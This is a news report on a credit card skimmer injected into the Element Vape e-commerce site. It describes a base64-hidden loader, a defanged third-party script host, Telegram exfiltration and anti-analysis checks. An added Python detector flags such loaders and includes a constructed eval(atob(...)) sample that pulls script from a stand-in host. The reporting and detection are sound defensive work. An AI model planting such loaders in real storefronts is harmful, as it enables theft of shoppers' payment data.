Element Vape, a popular online vendor of e-cigarettes and vaping kits, is hosting a credit card skimmer on its live website after being hacked. This retailer sells e-cigarettes, vaping equipment, e-liquids, and CBD products in both retail and online stores in the United States and Canada.
The website of Element Vape is loading a malicious JavaScript file from a third-party domain that appears to be a credit card stealer. Threat actors who inject credit card stealer scripts into e-commerce sites are collectively known as Magecart.
A suspicious base64-encoded script can be found on lines 45-50 of the HTML source code of several shop pages, starting with the homepage. How long the malicious script has been present on ElementVape.com is unknown.
According to a Wayback Machine review of ElementVape.com, this code was absent on February 5th, 2022, and earlier. The infection therefore appears to be recent, having occurred sometime after that date and before today’s discovery. Once decoded, the inline script simply loads the following JavaScript file from a third-party site:
//weicowire[.]com/js/jquery/frontend.js
When the above script was deobfuscated and analyzed, it was found to be harvesting customers’ credit card and invoice information during the checkout process. The email address, payment card details, phone number, and billing address (including street and ZIP code) are among the fields the script looks for.
The attacker receives this information via an obfuscated, hardcoded Telegram address embedded in the script. The script also contains anti-analysis checks that test whether it is running in a sandbox or with browser “devtools” open, in order to hinder examination.
It is unclear how ElementVape.com’s backend was initially compromised to allow the malicious script to be injected. This is also not the first time Element Vape’s security has been breached.
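A defender-side check for the injection pattern described above, that is, a base64 literal inside an inline script that decodes to a loader for a third-party script host, as an added example that is not from the article or the retailer’s own code; the allowed hostnames, the sample page and the skimmer-cdn.example host are constructed:

```python
import base64
import re
from urllib.parse import urlparse

# Bodies of inline <script> elements (those without a src attribute).
SCRIPT_RE = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.I | re.S)
# Quoted base64 literals long enough to hide a loader; short tokens are ignored.
B64_RE = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")
# Absolute or protocol-relative URLs inside the decoded text.
URL_RE = re.compile(r"(?:https?:)?//[A-Za-z0-9.-]+(?:/[^\s'\"<>]*)?")

# Hosts the shop legitimately loads scripts from (constructed); anything else is flagged.
ALLOWED_HOSTS = {"www.shop.example", "cdn.shop.example"}


def decode_b64_payloads(html):
    """Return the decoded text of every base64 literal found in inline scripts."""
    payloads = []
    for body in SCRIPT_RE.findall(html):
        for literal in B64_RE.findall(body):
            try:
                payloads.append(base64.b64decode(literal, validate=True).decode("utf-8"))
            except (ValueError, UnicodeDecodeError):
                continue  # not valid base64, or binary data: skip
    return payloads


def find_hidden_loaders(html, allowed_hosts=ALLOWED_HOSTS):
    """Report third-party script URLs hidden in base64 inside inline scripts."""
    findings = []
    for text in decode_b64_payloads(html):
        for url in URL_RE.findall(text):
            host = urlparse("https:" + url if url.startswith("//") else url).hostname
            if host and host not in allowed_hosts:
                findings.append({"host": host, "url": url, "decoded": text})
    return findings


# Constructed sample: a loader like the one described, hidden as base64 in the page.
LOADER = ("var s=document.createElement('script');"
          "s.src='//skimmer-cdn.example/js/jquery/frontend.js';"
          "document.head.appendChild(s);")
SAMPLE_HTML = (
    "<html><head><script src='https://cdn.shop.example/app.js'></script>"
    '<script>eval(atob("' + base64.b64encode(LOADER.encode()).decode() + '"));</script>'
    "</head><body>Storefront</body></html>"
)

if __name__ == "__main__":
    for f in find_hidden_loaders(SAMPLE_HTML):
        print("suspicious hidden loader:", f["host"], f["url"])
```

Run against a page fetched from a storefront, the same check can be scheduled to alert on any inline script whose decoded content points at a host outside the allowlist.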
Element Vape was alerted to the problem through its Zendesk support site, which did not appear to contain the malicious script at the time of review.
Because customers may be actively shopping on the site, disclosing details of this ongoing attack is in the public interest, as it helps prevent further theft of consumers’ financial information. If you have recently made purchases on the website, check your credit card statements for any unusual activity.